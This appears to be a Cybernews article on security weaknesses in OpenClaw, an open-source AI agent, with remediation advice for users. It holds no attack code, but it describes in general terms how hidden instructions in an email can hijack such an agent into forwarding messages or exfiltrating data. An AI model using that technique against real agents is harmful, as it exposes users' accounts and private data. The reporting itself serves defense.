As cybersecurity experts increasingly warn about vulnerabilities in Moltbot, an AI assistant now known as OpenClaw, here’s what users can do to prevent their data from being exposed.
-
Cybersecurity experts have repeatedly warned about vulnerabilities in OpenClaw, a new open-source AI assistant previously known as Moltbot.
-
Any connected tools and services, such as mailboxes, calendars, or messaging platforms, could be exposed.
-
Users may want to shut down the OpenClaw service and inspect the logs of the tool and the device to which it was connected.
-
Third-party accounts connected to OpenClaw should also be inspected for any potential changes, like sent messages or purchased services.
An open-source AI assistant, OpenClaw, previously known as Moltbot and Clawdbot, has surged in popularity in recent weeks and is now estimated to have between 300,000 and 400,000 users, according to OX Security.
OpenClaw runs on the user’s hardware and can connect to third-party services, such as email, calendars, chat apps, and browsers. It is designed to take actions by command and can be used to automate tasks, such as sending emails or interacting with online services.
Initial enthusiasm over OpenClaw was followed by confusion after news broke that its agents had started organizing themselves on the AI-only social media network Moltbook. However, it was later revealed that humans could post content disguised as AI agents.
An investigation by cybersecurity firm Wiz released on February 2nd found that the Reddit-like platform exposed 35,000 email addresses, 1.5 million API authentication tokens, and private messages between the AI agents.
Security concerns were also raised by researchers from OX Security, who warned that OpenClaw is a vibe-coded project without guardrails that is “one step away from a massive data breach.”
Baruch Weizman, CTO and Cofounder at cybersecurity firm Cyata, says the risk lies in OpenClaw’s autonomy, as it fetches skills from the internet and executes them.
“A crafted email with hidden instructions can cause the agent to act against your interests – forwarding messages, exfiltrating data, taking actions you never authorized. No clicks, no warnings,” he says.
What data is at risk with OpenClaw?
Savva Pistolas, a technical director at cybersecurity consultancy ADAS, says everything Moltbot can access, store, or act on is at risk of exposure.
The key areas of concern are account credentials and API keys, as well as the appeal of OpenClaw configuration files to credential-stealers. Any connected files, such as SSH keys, or services like mailboxes, calendars, or chat platforms, are prime targets for attacks.
Pistolas points to reports of exposed OpenClaw interfaces on Shodan, a search engine for internet-connected devices, which makes the AI assistant vulnerable to automated attacks.
“It isn’t a new approach to compromising developers and techies who want to host their own services, but end up helping bad actors leapfrog into enterprise network environments,” Pistolas tells Cybernews.
Peter Steinberger, the creator of OpenClaw, acknowledged the security risks of what he called “a free, open source hobby project.” In his statement to CNBC, Steinberger said he doesn’t yet recommend the agent to non-technical users.
How do I prevent OpenClaw from exposing my data?
Aras Nazarovas, an information security researcher at Cybernews, recommends OpenClaw users who worry about their data being exposed take the following steps:
- Immediately shut down the OpenClaw service. Inspect the logs of the tool and the system logs of the device on which the tool was running to detect any suspicious activity.
- Inspect third-party accounts connected to the tool and look for any potential changes, such as sent messages, updated account settings, changed billing details, or purchased services.
- If you find anything suspicious, change account authentication details, such as passwords and API keys.
- If you find anything suspicious in system logs, identify if it stored any sensitive data, change any associated authentication details, and reinstall the OS on the affected device.
“If you wish to continue using the tool in the future, ensure that you are running it in an isolated environment, with restricted access controls, such as local network connectivity only or an IP whitelist, as well as a strong password or auth token,” Nazarovas says.
He adds that users should run OpenClaw with the lowest possible privileges and actively monitor the tool’s activity logs and changes in future releases.
Curious what others think about this story? Contribute your thoughts to the debate below.
Collin Spears, a senior director of product management at Black Duck Software, says the Molbot case teaches a clear lesson.
He tells Cybernews, “Any AI tool that can read your email and execute commands on your behalf needs the same caution you’d give to a stranger asking for your house keys. If the tool doesn’t explain exactly what it can access and who else might see it, don’t install it.”
Eglė Krištopaitytė is a journalist at Cybernews, focusing on topics related to AI regulation and the technology’s impact across societies, industries, and everyday lives. Before joining Cybernews, Eglė covered international politics and health in various media outlets for nearly eight years. She holds a Bachelor’s degree in Linguistics from Vilnius University, where she also worked as a science communications officer. At Cybernews, Eglė aims to look beyond the AI hype and educate readers about the potential benefits and risks of this emerging technology.
Unlock more exclusive Cybernews content on YouTube.
Your email address will not be published. Required fields are markedmarked